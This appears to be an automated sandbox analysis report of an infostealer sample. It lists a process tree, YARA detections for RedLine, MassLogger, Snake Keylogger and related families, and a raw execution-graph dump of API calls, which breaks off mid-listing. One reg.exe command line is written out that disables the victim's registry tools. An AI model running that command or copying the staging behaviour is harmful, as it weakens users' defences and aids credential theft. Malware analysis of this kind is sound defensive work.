                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:02:29:35
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                      Imagebase:0x550000
                                                                                      File size:59'392 bytes
                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:02:29:35
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:02:29:37
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\Uhzauuil.PIF
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Libraries\Uhzauuil.PIF"
                                                                                      Imagebase:0x400000
                                                                                      File size:854'016 bytes
                                                                                      MD5 hash:4692AEE744A1B1FAB794FF334A77A462
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:Borland Delphi
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:02:29:37
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:175'800 bytes
                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000001.2046847022.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000002.3089641728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3110411476.000000001C8BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:18
                                                                                      Start time:02:29:42
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                      Imagebase:0x550000
                                                                                      File size:59'392 bytes
                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:19
                                                                                      Start time:02:29:42
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:16.8%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:29.3%
                                                                                        Total number of Nodes:1694
                                                                                        Total number of Limit Nodes:17
                                                                                        execution_graph 28129 27d1c6c 28130 27d1c7c 28129->28130 28131 27d1d04 28129->28131 28132 27d1c89 28130->28132 28133 27d1cc0 28130->28133 28134 27d1d0d 28131->28134 28135 27d1f58 28131->28135 28136 27d1c94 28132->28136 28177 27d1724 28132->28177 28139 27d1724 10 API calls 28133->28139 28138 27d1d25 28134->28138 28152 27d1e24 28134->28152 28137 27d1fec 28135->28137 28141 27d1fac 28135->28141 28142 27d1f68 28135->28142 28144 27d1d2c 28138->28144 28149 27d1d48 28138->28149 28153 27d1dfc 28138->28153 28158 27d1cd7 28139->28158 28145 27d1fb2 28141->28145 28150 27d1724 10 API calls 28141->28150 28147 27d1724 10 API calls 28142->28147 28143 27d1e7c 28148 27d1724 10 API calls 28143->28148 28163 27d1e95 28143->28163 28146 27d1ca1 28167 27d1cb9 28146->28167 28201 27d1a8c 28146->28201 28151 27d1f82 28147->28151 28161 27d1f2c 28148->28161 28155 27d1d9c 28149->28155 28156 27d1d79 Sleep 28149->28156 28171 27d1fc1 28150->28171 28170 27d1a8c 8 API calls 28151->28170 28174 27d1fa7 28151->28174 28152->28143 28154 27d1e55 Sleep 28152->28154 28152->28163 28157 27d1724 10 API calls 28153->28157 28154->28143 28159 27d1e6f Sleep 28154->28159 28156->28155 28160 27d1d91 Sleep 28156->28160 28169 27d1e05 28157->28169 28162 27d1a8c 8 API calls 28158->28162 28166 27d1cfd 28158->28166 28159->28152 28160->28149 28161->28163 28168 27d1a8c 8 API calls 28161->28168 28162->28166 28165 27d1e1d 28172 27d1f50 28168->28172 28169->28165 28173 27d1a8c 8 API calls 28169->28173 28170->28174 28171->28174 28175 27d1a8c 8 API calls 28171->28175 28173->28165 28176 27d1fe4 28175->28176 28178 27d173c 28177->28178 28179 27d1968 28177->28179 28189 27d17cb Sleep 28178->28189 28191 27d174e 28178->28191 28180 27d1a80 28179->28180 28181 27d1938 28179->28181 28182 27d1a89 28180->28182 28183 27d1684 VirtualAlloc 28180->28183 28185 27d1947 Sleep 28181->28185 28194 27d1986 28181->28194 28182->28146 28186 27d16bf 28183->28186 28187 27d16af 28183->28187 28184 27d175d 28184->28146 28188 27d195d Sleep 28185->28188 28185->28194 28186->28146 28218 27d1644 28187->28218 28188->28181 28189->28191 28193 27d17e4 Sleep 28189->28193 28190 27d182c 28200 27d1838 28190->28200 28224 27d15cc 28190->28224 28191->28184 28191->28190 28195 27d180a Sleep 28191->28195 28193->28178 28196 27d19a4 28194->28196 28197 27d15cc VirtualAlloc 28194->28197 28195->28190 28198 27d1820 Sleep 28195->28198 28196->28146 28197->28196 28198->28191 28200->28146 28202 27d1b6c 28201->28202 28203 27d1aa1 28201->28203 28204 27d16e8 28202->28204 28205 27d1aa7 28202->28205 28203->28205 28208 27d1b13 Sleep 28203->28208 28207 27d1c66 28204->28207 28211 27d1644 2 API calls 28204->28211 28206 27d1ab0 28205->28206 28210 27d1b4b Sleep 28205->28210 28214 27d1b81 28205->28214 28206->28167 28207->28167 28208->28205 28209 27d1b2d Sleep 28208->28209 28209->28203 28212 27d1b61 Sleep 28210->28212 28210->28214 28213 27d16f5 VirtualFree 28211->28213 28212->28205 28215 27d170d 28213->28215 28216 27d1c00 VirtualFree 28214->28216 28217 27d1ba4 28214->28217 28215->28167 28216->28167 28217->28167 28219 27d164d 28218->28219 28220 27d1681 28218->28220 28219->28220 28221 27d164f Sleep 28219->28221 28220->28186 28222 27d1664 28221->28222 28222->28220 28223 27d1668 Sleep 28222->28223 28223->28219 28228 27d1560 28224->28228 28226 27d15d4 VirtualAlloc 28227 27d15eb 28226->28227 28227->28200 28229 27d1500 28228->28229 28229->28226 28230 27d4edc 28231 27d4ee9 28230->28231 28235 27d4ef0 28230->28235 28236 27d4c38 28231->28236 28242 27d4c50 28235->28242 28237 27d4c4c 28236->28237 28238 27d4c3c SysAllocStringLen 28236->28238 28237->28235 28238->28237 28239 27d4c30 28238->28239 28240 27d4f26 SysAllocStringLen 28239->28240 28241 27d4f3c 28239->28241 28240->28239 28240->28241 28241->28235 28243 27d4c5c 28242->28243 28244 27d4c56 SysFreeString 28242->28244 28244->28243 28245 27d4c9c 28246 27d4ca0 28245->28246 28247 27d4cc3 28245->28247 28248 27d4c60 28246->28248 28251 27d4cb3 SysReAllocStringLen 28246->28251 28249 27d4c74 28248->28249 28250 27d4c66 SysFreeString 28248->28250 28250->28249 28251->28247 28252 27d4c30 28251->28252 28253 27d4f3c 28252->28253 28254 27d4f26 SysAllocStringLen 28252->28254 28254->28252 28254->28253 28255 27fd2fc 28265 27d656c 28255->28265 28259 27fd32a 28270 27fc534 timeSetEvent 28259->28270 28261 27fd334 28262 27fd342 GetMessageA 28261->28262 28263 27fd336 TranslateMessage DispatchMessageA 28262->28263 28264 27fd352 28262->28264 28263->28262 28266 27d6577 28265->28266 28271 27d4198 28266->28271 28269 27d42ac SysFreeString SysReAllocStringLen SysAllocStringLen 28269->28259 28270->28261 28272 27d41de 28271->28272 28273 27d43e8 28272->28273 28274 27d4257 28272->28274 28276 27d4419 28273->28276 28281 27d442a 28273->28281 28285 27d4130 28274->28285 28290 27d435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 28276->28290 28279 27d4423 28279->28281 28280 27d446f FreeLibrary 28280->28281 28281->28280 28282 27d4493 28281->28282 28283 27d449c 28282->28283 28284 27d44a2 ExitProcess 28282->28284 28283->28284 28286 27d4173 28285->28286 28287 27d4140 28285->28287 28286->28269 28287->28286 28288 27d15cc VirtualAlloc 28287->28288 28291 27d5868 28287->28291 28288->28287 28290->28279 28292 27d5878 GetModuleFileNameA 28291->28292 28293 27d5894 28291->28293 28295 27d5acc GetModuleFileNameA RegOpenKeyExA 28292->28295 28293->28287 28296 27d5b4f 28295->28296 28297 27d5b0f RegOpenKeyExA 28295->28297 28313 27d5908 12 API calls 28296->28313 28297->28296 28298 27d5b2d RegOpenKeyExA 28297->28298 28298->28296 28300 27d5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 28298->28300 28304 27d5c0f 28300->28304 28305 27d5cf2 28300->28305 28301 27d5b74 RegQueryValueExA 28302 27d5b94 RegQueryValueExA 28301->28302 28303 27d5bb2 RegCloseKey 28301->28303 28302->28303 28303->28293 28304->28305 28306 27d5c1f lstrlenA 28304->28306 28305->28293 28308 27d5c37 28306->28308 28308->28305 28309 27d5c5c lstrcpynA LoadLibraryExA 28308->28309 28310 27d5c84 28308->28310 28309->28310 28310->28305 28311 27d5c8e lstrcpynA LoadLibraryExA 28310->28311 28311->28305 28312 27d5cc0 lstrcpynA LoadLibraryExA 28311->28312 28312->28305 28313->28301 28314 27fc528 28317 27efabc 28314->28317 28318 27efac4 28317->28318 28318->28318 30725 27e8784 LoadLibraryW 28318->30725 28320 27efae6 30730 27d2ee0 QueryPerformanceCounter 28320->30730 28322 27efaeb 28323 27efaf5 InetIsOffline 28322->28323 28324 27efaff 28323->28324 28325 27efb10 28323->28325 30742 27d4530 28324->30742 28326 27d4530 11 API calls 28325->28326 28328 27efb0e 28326->28328 30733 27d4860 28328->30733 30748 27e8140 30725->30748 30727 27e87bd 30759 27e7d78 30727->30759 30731 27d2eed 30730->30731 30732 27d2ef8 GetTickCount 30730->30732 30731->28322 30732->28322 30734 27d4871 30733->30734 30735 27d48ae 30734->30735 30736 27d4897 30734->30736 30738 27d45a0 11 API calls 30735->30738 30737 27d4bcc 11 API calls 30736->30737 30739 27d48a4 30737->30739 30738->30739 30740 27d48df 30739->30740 30741 27d4530 11 API calls 30739->30741 30741->30740 30743 27d4544 30742->30743 30744 27d4534 30742->30744 30745 27d4572 30743->30745 30747 27d2c2c 11 API calls 30743->30747 30744->30743 30746 27d45a0 11 API calls 30744->30746 30745->28328 30746->30743 30747->30745 30749 27d4530 11 API calls 30748->30749 30750 27e8165 30749->30750 30773 27e798c 30750->30773 30754 27e817f 30755 27e8187 GetModuleHandleW GetProcAddress GetProcAddress 30754->30755 30756 27e81ba 30755->30756 30794 27d4500 30756->30794 30760 27d4530 11 API calls 30759->30760 30761 27e7d9d 30760->30761 30762 27e798c 12 API calls 30761->30762 30763 27e7daa 30762->30763 30764 27d47ec 11 API calls 30763->30764 30765 27e7dba 30764->30765 30837 27e8098 30765->30837 30768 27e8140 15 API calls 30769 27e7dd3 NtWriteVirtualMemory 30768->30769 30770 27e7dff 30769->30770 30771 27d4500 11 API calls 30770->30771 30772 27e7e0c FreeLibrary 30771->30772 30772->28320 30774 27e799d 30773->30774 30798 27d4bcc 30774->30798 30776 27e7a19 30779 27d47ec 30776->30779 30777 27e79ad 30777->30776 30807 27dbabc CharNextA 30777->30807 30780 27d47f0 30779->30780 30781 27d4851 30779->30781 30782 27d4530 30780->30782 30784 27d47f8 30780->30784 30787 27d45a0 11 API calls 30782->30787 30789 27d4544 30782->30789 30783 27d4807 30788 27d45a0 11 API calls 30783->30788 30784->30781 30784->30783 30786 27d4530 11 API calls 30784->30786 30785 27d4572 30785->30754 30786->30783 30787->30789 30791 27d4821 30788->30791 30789->30785 30790 27d2c2c 11 API calls 30789->30790 30790->30785 30792 27d4530 11 API calls 30791->30792 30793 27d484d 30792->30793 30793->30754 30796 27d4506 30794->30796 30795 27d452c 30795->30727 30796->30795 30797 27d2c2c 11 API calls 30796->30797 30797->30796 30799 27d4bd9 30798->30799 30806 27d4c09 30798->30806 30801 27d4c02 30799->30801 30803 27d4be5 30799->30803 30809 27d45a0 30801->30809 30802 27d4bf3 30802->30777 30808 27d2c44 11 API calls 30803->30808 30814 27d44dc 30806->30814 30807->30777 30808->30802 30810 27d45c8 30809->30810 30811 27d45a4 30809->30811 30810->30806 30818 27d2c10 30811->30818 30813 27d45b1 30813->30806 30815 27d44e2 30814->30815 30817 27d44fd 30814->30817 30815->30817 30828 27d2c2c 30815->30828 30817->30802 30819 27d2c27 30818->30819 30821 27d2c14 30818->30821 30819->30813 30820 27d2c1e 30820->30813 30821->30820 30822 27d2d19 30821->30822 30826 27d6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 30821->30826 30827 27d2ce8 7 API calls 30822->30827 30825 27d2d3a 30825->30813 30826->30822 30827->30825 30829 27d2c3a 30828->30829 30830 27d2c30 30828->30830 30829->30817 30830->30829 30831 27d2d19 30830->30831 30835 27d6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 30830->30835 30836 27d2ce8 7 API calls 30831->30836 30834 27d2d3a 30834->30817 30835->30831 30836->30834 30838 27d4530 11 API calls 30837->30838 30839 27e80bb 30838->30839 30840 27e798c 12 API calls 30839->30840 30841 27e80c8 30840->30841 30842 27e80d0 GetModuleHandleA 30841->30842 30843 27e8140 15 API calls 30842->30843 30844 27e80e1 GetModuleHandleA 30843->30844 30845 27e80ff 30844->30845 30846 27d44dc 11 API calls 30845->30846 30847 27e7dcd 30846->30847 30847->30768 30848 27f7244 30849 27d4860 11 API calls 30848->30849 30850 27f7265 30849->30850 30851 27d47ec 11 API calls 30850->30851 30852 27f729c 30851->30852 31665 27e889c 30852->31665 30855 27d4860 11 API calls 30856 27f72e1 30855->30856 30857 27d47ec 11 API calls 30856->30857 30858 27f7318 30857->30858 30859 27e889c 22 API calls 30858->30859 30860 27f733c 30859->30860 30861 27d4860 11 API calls 30860->30861 30862 27f735d 30861->30862 30863 27d47ec 11 API calls 30862->30863 30864 27f7394 30863->30864 30865 27e889c 22 API calls 30864->30865 30866 27f73b8 30865->30866 30867 27d4860 11 API calls 30866->30867 30868 27f73d9 30867->30868 30869 27d47ec 11 API calls 30868->30869 30870 27f7410 30869->30870 30871 27e889c 22 API calls 30870->30871 30872 27f7434 30871->30872 30873 27d4860 11 API calls 30872->30873 30874 27f7455 30873->30874 30875 27d47ec 11 API calls 30874->30875 30876 27f748c 30875->30876 30877 27e889c 22 API calls 30876->30877 30878 27f74b0 30877->30878 30879 27d4860 11 API calls 30878->30879 30880 27f74ea 30879->30880 31678 27ee3ec 30880->31678 30882 27f7519 31688 27ef508 30882->31688 30885 27d4860 11 API calls 30886 27f7569 30885->30886 30887 27d47ec 11 API calls 30886->30887 30888 27f75a0 30887->30888 30889 27e889c 22 API calls 30888->30889 30890 27f75c4 30889->30890 30891 27d4860 11 API calls 30890->30891 30892 27f75e5 30891->30892 30893 27d47ec 11 API calls 30892->30893 30894 27f761c 30893->30894 30895 27e889c 22 API calls 30894->30895 30896 27f7640 30895->30896 30897 27d4860 11 API calls 30896->30897 30898 27f7661 30897->30898 30899 27d47ec 11 API calls 30898->30899 30900 27f7698 30899->30900 30901 27e889c 22 API calls 30900->30901 30902 27f76bc 30901->30902 30903 27d4860 11 API calls 30902->30903 30904 27f76dd 30903->30904 30905 27d47ec 11 API calls 30904->30905 30906 27f7714 30905->30906 30907 27e889c 22 API calls 30906->30907 30908 27f7738 30907->30908 30909 27d4860 11 API calls 30908->30909 30910 27f7759 30909->30910 30911 27d47ec 11 API calls 30910->30911 30912 27f7790 30911->30912 30913 27e889c 22 API calls 30912->30913 30914 27f77b4 30913->30914 30915 27d4860 11 API calls 30914->30915 30916 27f77d5 30915->30916 30917 27d47ec 11 API calls 30916->30917 30918 27f780c 30917->30918 30919 27e889c 22 API calls 30918->30919 30920 27f7830 30919->30920 30921 27d4860 11 API calls 30920->30921 30922 27f7851 30921->30922 30923 27d47ec 11 API calls 30922->30923 30924 27f7888 30923->30924 30925 27e889c 22 API calls 30924->30925 30926 27f78ac 30925->30926 30927 27d4860 11 API calls 30926->30927 30928 27f78cd 30927->30928 30929 27d47ec 11 API calls 30928->30929 30930 27f7904 30929->30930 30931 27e889c 22 API calls 30930->30931 30932 27f7928 30931->30932 30933 27d4860 11 API calls 30932->30933 30934 27f7949 30933->30934 30935 27d47ec 11 API calls 30934->30935 30936 27f7980 30935->30936 30937 27e889c 22 API calls 30936->30937 30938 27f79a4 30937->30938 30939 27f79b9 30938->30939 30940 27f84e8 30938->30940 30942 27d4860 11 API calls 30939->30942 30941 27d4860 11 API calls 30940->30941 30943 27f8509 30941->30943 30944 27f79da 30942->30944 30946 27d47ec 11 API calls 30943->30946 30945 27d47ec 11 API calls 30944->30945 30948 27f7a11 30945->30948 30947 27f8540 30946->30947 30949 27e889c 22 API calls 30947->30949 30950 27e889c 22 API calls 30948->30950 30951 27f8564 30949->30951 30952 27f7a35 30950->30952 30953 27d4860 11 API calls 30951->30953 30954 27d4860 11 API calls 30952->30954 30955 27f8585 30953->30955 30956 27f7a56 30954->30956 30957 27d47ec 11 API calls 30955->30957 30958 27d47ec 11 API calls 30956->30958 30959 27f85bc 30957->30959 30960 27f7a8d 30958->30960 30961 27e889c 22 API calls 30959->30961 30962 27e889c 22 API calls 30960->30962 30963 27f85e0 30961->30963 30964 27f7ab1 30962->30964 30965 27d4860 11 API calls 30963->30965 30966 27d4860 11 API calls 30964->30966 30967 27f8601 30965->30967 30968 27f7ad2 30966->30968 30969 27d47ec 11 API calls 30967->30969 30970 27d47ec 11 API calls 30968->30970 30972 27f8638 30969->30972 30971 27f7b09 30970->30971 30974 27e889c 22 API calls 30971->30974 30973 27e889c 22 API calls 30972->30973 30975 27f865c 30973->30975 30976 27f7b2d 30974->30976 30977 27d4860 11 API calls 30975->30977 30978 27d47ec 11 API calls 30976->30978 30980 27f867d 30977->30980 30979 27f7b45 30978->30979 32145 27e8488 30979->32145 30983 27d47ec 11 API calls 30980->30983 30982 27f7b56 30984 27d4860 11 API calls 30982->30984 30985 27f86b4 30983->30985 30986 27f7b77 30984->30986 30988 27e889c 22 API calls 30985->30988 30987 27d47ec 11 API calls 30986->30987 30992 27f7bae 30987->30992 30989 27f86d8 30988->30989 30990 27f86ed 30989->30990 30991 27f9571 30989->30991 30993 27d4860 11 API calls 30990->30993 30994 27d4860 11 API calls 30991->30994 30996 27e889c 22 API calls 30992->30996 30995 27f870e 30993->30995 30999 27f9592 30994->30999 31000 27f8726 30995->31000 30997 27f7bd2 30996->30997 30998 27d4860 11 API calls 30997->30998 31004 27f7bf3 30998->31004 31001 27d47ec 11 API calls 30999->31001 31002 27d47ec 11 API calls 31000->31002 31006 27f95c9 31001->31006 31003 27f8745 31002->31003 31007 27f875d 31003->31007 31005 27d47ec 11 API calls 31004->31005 31011 27f7c2a 31005->31011 31008 27e889c 22 API calls 31006->31008 31009 27e889c 22 API calls 31007->31009 31012 27f95ed 31008->31012 31010 27f8769 31009->31010 31013 27d4860 11 API calls 31010->31013 31016 27e889c 22 API calls 31011->31016 31014 27d4860 11 API calls 31012->31014 31015 27f878a 31013->31015 31019 27f960e 31014->31019 31020 27f8795 31015->31020 31017 27f7c4e 31016->31017 31018 27d4860 11 API calls 31017->31018 31024 27f7c6f 31018->31024 31021 27d47ec 11 API calls 31019->31021 31022 27d47ec 11 API calls 31020->31022 31026 27f9645 31021->31026 31023 27f87c1 31022->31023 31027 27f87cc 31023->31027 31025 27d47ec 11 API calls 31024->31025 31030 27f7ca6 31025->31030 31028 27e889c 22 API calls 31026->31028 31029 27e889c 22 API calls 31027->31029 31031 27f9669 31028->31031 31032 27f87e5 31029->31032 31035 27e889c 22 API calls 31030->31035 31033 27d4860 11 API calls 31031->31033 31034 27d4860 11 API calls 31032->31034 31037 27f968a 31033->31037 31036 27f8806 31034->31036 31038 27f7cca 31035->31038 31040 27d47ec 11 API calls 31036->31040 31039 27d47ec 11 API calls 31037->31039 32157 27eacb0 29 API calls 31038->32157 31044 27f96c1 31039->31044 31045 27f883d 31040->31045 31042 27f7cf1 31043 27d4860 11 API calls 31042->31043 31049 27f7d12 31043->31049 31046 27e889c 22 API calls 31044->31046 31047 27e889c 22 API calls 31045->31047 31057 27f96e5 31046->31057 31048 27f8861 31047->31048 31050 27d47ec 11 API calls 31048->31050 31051 27d47ec 11 API calls 31049->31051 31052 27f888d 31050->31052 31056 27f7d49 31051->31056 31055 27f88a5 31052->31055 31053 27f9ea0 31054 27d4860 11 API calls 31053->31054 31061 27f9ec1 31054->31061 31059 27f88b0 CreateProcessAsUserW 31055->31059 31060 27e889c 22 API calls 31056->31060 31057->31053 31058 27d4860 11 API calls 31057->31058 31069 27f9730 31058->31069 31062 27f893e 31059->31062 31063 27f88c2 31059->31063 31064 27f7d6d 31060->31064 31065 27d47ec 11 API calls 31061->31065 31066 27d4860 11 API calls 31062->31066 31067 27d4860 11 API calls 31063->31067 31068 27d4860 11 API calls 31064->31068 31073 27f9ef8 31065->31073 31074 27f895f 31066->31074 31070 27f88e3 31067->31070 31075 27f7d8e 31068->31075 31071 27d47ec 11 API calls 31069->31071 31072 27f88ee 31070->31072 31081 27f9767 31071->31081 31078 27d47ec 11 API calls 31072->31078 31076 27e889c 22 API calls 31073->31076 31077 27d47ec 11 API calls 31074->31077 31079 27d47ec 11 API calls 31075->31079 31080 27f9f1c 31076->31080 31088 27f8996 31077->31088 31082 27f891a 31078->31082 31086 27f7dc5 31079->31086 31083 27d4860 11 API calls 31080->31083 31084 27e889c 22 API calls 31081->31084 31085 27f8925 31082->31085 31093 27f9f3d 31083->31093 31087 27f978b 31084->31087 31091 27e889c 22 API calls 31085->31091 31092 27e889c 22 API calls 31086->31092 31089 27d4860 11 API calls 31087->31089 31090 27e889c 22 API calls 31088->31090 31099 27f97ac 31089->31099 31094 27f89ba 31090->31094 31091->31062 31095 27f7de9 31092->31095 31098 27d47ec 11 API calls 31093->31098 31096 27d4860 11 API calls 31094->31096 31097 27d4860 11 API calls 31095->31097 31102 27f89db 31096->31102 31103 27f7e0a 31097->31103 31101 27f9f74 31098->31101 31100 27d47ec 11 API calls 31099->31100 31108 27f97e3 31100->31108 31104 27e889c 22 API calls 31101->31104 31105 27d47ec 11 API calls 31102->31105 31106 27d47ec 11 API calls 31103->31106 31107 27f9f98 31104->31107 31113 27f8a12 31105->31113 31111 27f7e41 31106->31111 31109 27d4860 11 API calls 31107->31109 31110 27e889c 22 API calls 31108->31110 31116 27f9fb9 31109->31116 31112 27f9807 31110->31112 31115 27e889c 22 API calls 31111->31115 31114 27d4860 11 API calls 31112->31114 31117 27e889c 22 API calls 31113->31117 31122 27f9828 31114->31122 31118 27f7e65 31115->31118 31120 27d47ec 11 API calls 31116->31120 31119 27f8a36 31117->31119 31124 27d4860 11 API calls 31118->31124 31121 27d49f8 11 API calls 31119->31121 31126 27f9ff0 31120->31126 31123 27f8a5a 31121->31123 31125 27d47ec 11 API calls 31122->31125 31127 27d4860 11 API calls 31123->31127 31130 27f7ea5 31124->31130 31131 27f985f 31125->31131 31128 27e889c 22 API calls 31126->31128 31129 27f8a89 31127->31129 31134 27fa014 31128->31134 31136 27f8a94 31129->31136 31132 27d47ec 11 API calls 31130->31132 31133 27e889c 22 API calls 31131->31133 31139 27f7edc 31132->31139 31135 27f9883 31133->31135 31140 27e889c 22 API calls 31134->31140 31700 27ef388 31135->31700 31138 27d47ec 11 API calls 31136->31138 31142 27f8ac0 31138->31142 31144 27e889c 22 API calls 31139->31144 31148 27fa047 31140->31148 31146 27f8acb 31142->31146 31143 27d4860 11 API calls 31150 27f98c7 31143->31150 31145 27f7f00 31144->31145 31147 27d4860 11 API calls 31145->31147 31149 27e889c 22 API calls 31146->31149 31155 27f7f21 31147->31155 31152 27e889c 22 API calls 31148->31152 31151 27f8ae4 31149->31151 31153 27d4860 11 API calls 31150->31153 31154 27d4860 11 API calls 31151->31154 31156 27fa07a 31152->31156 31158 27f98ff 31153->31158 31159 27f8b05 31154->31159 31157 27d47ec 11 API calls 31155->31157 31160 27e889c 22 API calls 31156->31160 31163 27f7f58 31157->31163 31161 27d47ec 11 API calls 31158->31161 31162 27d47ec 11 API calls 31159->31162 31165 27fa0ad 31160->31165 31167 27f9936 31161->31167 31168 27f8b3c 31162->31168 31164 27e889c 22 API calls 31163->31164 31166 27f7f7c 31164->31166 31170 27e889c 22 API calls 31165->31170 31169 27d4860 11 API calls 31166->31169 31173 27e889c 22 API calls 31167->31173 31171 27e889c 22 API calls 31168->31171 31179 27f7f9d 31169->31179 31172 27fa0e0 31170->31172 31174 27f8b60 31171->31174 31175 27d4860 11 API calls 31172->31175 31176 27f995a 31173->31176 31177 27d4860 11 API 